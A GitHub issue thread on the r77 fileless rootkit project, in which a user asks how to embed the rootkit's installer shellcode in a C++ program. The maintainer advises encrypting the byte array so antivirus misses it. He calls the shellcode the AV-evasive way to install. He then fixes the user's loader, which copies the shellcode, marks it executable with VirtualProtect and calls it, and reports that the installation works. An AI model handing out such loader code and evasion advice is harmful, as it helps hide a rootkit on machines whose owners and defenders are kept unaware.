bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License
1.55k stars, 383 forks

How to use shellcode? #61

Closed Summ3rM0 closed 6 months ago

Summ3rM0 commented 7 months ago

Dear esteemed program author,

I hope this message finds you well. I'm reaching out once again with a question that has lingered in my mind for quite some time. Your expertise is renowned, and I am truly grateful for any guidance you can offer.

I've been struggling to comprehend how to utilize your shellcode in C++. This topic has been a maze for me, and your insight would be invaluable. If you could spare a moment to provide an example or any direction, it would mean the world to me.

Thank you immensely for considering my query.

Warm regards

Summ3rM0 commented 7 months ago

My point is, I've gone through the C++ sample files included in the compressed folder, but I'm unclear on how to use them. For instance, how do I integrate the content of the shellcode into a C++ program?

bytecode77 commented 7 months ago

When you integrate r77 into your program, you need to run the installer only once. If you want to install a newer version of r77, then you need to run the installer again. But anyway, the installer really needs to be executed only once, i.e. within the installation procedure of your application.

Install.exe is the installer that you would write to disk and run. However, once you write it to the disk, it will be discovered by AV.

Install.shellcode is a wrapper around Install.exe. The provided example is the AV-evasive alternative to ShellExecute("Install.exe", ...).

From InstallShellCode.cpp

// 1. Load Install.shellcode from resources or from a BYTE[]
// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
LPBYTE shellCode = ...

You need to put the file Install.shellcode into your executable's resources, or place it in an array, such as

unsigned char shellCode[] = { 0x12, 0x34, 0x56, 0x78, ........ };

And since you try to evade AV, you certainly need to do at least some trivial encryption on that byte array, otherwise AV will find the signatures of the installer within your executable...

Summ3rM0 commented 7 months ago

Thank you, dear author. I still don't quite understand how to convert the on-disk install.shellcode file to a byte array and embed it into the C program. Do I convert the file to hexadecimal format and assign it to the shellCode variable? And, if it doesn't bother you, and you're happy to give me some advice... How would you encrypt this byte array? I am very sorry, my original purpose of learning the C language is to participate in computer competitions rather than to write such programs, so I am not very experienced. If you can give me a little help, I would really appreciate it.

Summ3rM0 commented 7 months ago

One more small question: if I embed install.shellcode into my C program, do I need administrator privileges to run it?

bytecode77 commented 7 months ago

You always need elevated privileges to install r77. If you're learning to program, then maybe converting a file into a hexadecimal array could be a good exercise 👍

Summ3rM0 commented 7 months ago

#include <windows.h>

int main()
{
    unsigned char shellCode[] = { 0x12 }; // Here is the content of the shellcode
    unsigned int shellCodeSize = 167320;

    DWORD oldProtect;
    VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect);

    ((void(*)())shellCode)();

    return 0;
}

After I run it as an administrator, it doesn't work. Can you help me see the problem?

bytecode77 commented 7 months ago

I tried it out to see whether it works. First off, I get a compile error: 'type cast': cannot convert from 'BYTE [167320]' to 'void (__cdecl *)(void)'

So I just quickly changed the code to copy the buffer first. Installation worked.

LPBYTE copy = new BYTE[167320];
memcpy(copy, shellCode, 167320);

DWORD oldProtect;
VirtualProtect(copy, 167320, PAGE_EXECUTE_READWRITE, &oldProtect);

((void(*)())copy)();

If it doesn't work for you, ...